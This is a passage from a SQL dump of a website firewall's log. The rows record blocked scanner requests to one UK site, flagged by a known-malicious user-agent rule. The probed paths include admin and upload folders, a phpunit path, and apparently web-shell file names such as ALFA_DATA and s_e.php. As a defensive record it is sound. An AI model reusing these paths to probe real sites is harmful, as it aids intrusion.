User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2VkaXRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12274,1674883077.257786,1674883077.126200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/files/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZpbGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12275,1674883072.296814,1674883072.165800,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/home/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2hvbWUv\",\"category\":\"brute-force\",\"ssl\":1}'),(12276,1674883067.651321,1674883067.492600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload/image/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12277,1674883062.686194,1674883062.548300,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12278,1674883058.138312,1674883058.010900,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/assets/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12279,1674883053.035577,1674883052.905200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/images/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12280,1674883048.011031,1674883047.885200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12281,1674883043.475879,1674883043.347300,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/Admin/uploads/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12282,1674883038.903775,1674883038.772000,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/uploads/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12283,1674883032.449334,1674883032.329400,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12284,1674883028.635497,1674883028.503100,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/uploads/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12285,1674883023.593120,1674883023.462500,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/acme-challenge/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12286,1674883019.310235,1674883019.178700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-knownold/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12287,1674883014.888410,1674883014.760500,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12288,1674883010.461038,1674883010.310400,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12289,1674882980.327891,1674882980.220400,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12290,1674882977.061490,1674882976.951200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12291,1674882972.677345,1674882972.560900,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12292,1674882968.890030,1674882968.762000,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins-old/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy1vbGQv\",\"category\":\"brute-force\",\"ssl\":1}'),(12293,1674883167.143064,1674883166.997700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12294,1674883148.105057,1674883147.952200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/user/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(12295,1674883143.977791,1674883143.847900,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/network/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(12296,1674883140.050068,1674883139.939100,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/meta/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(12297,1674890206.302897,1674890206.171800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12298,1674890163.869562,1674890163.735200,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12299,1674890134.191067,1674890134.055800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12300,1674890075.780993,1674890075.650200,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12301,1674890054.789975,1674890054.638100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12302,1674890009.042882,1674890008.912300,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12303,1674889956.914981,1674889956.782400,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12304,1674889500.754689,1674889500.594000,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12305,1674889500.361210,1674889500.229500,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 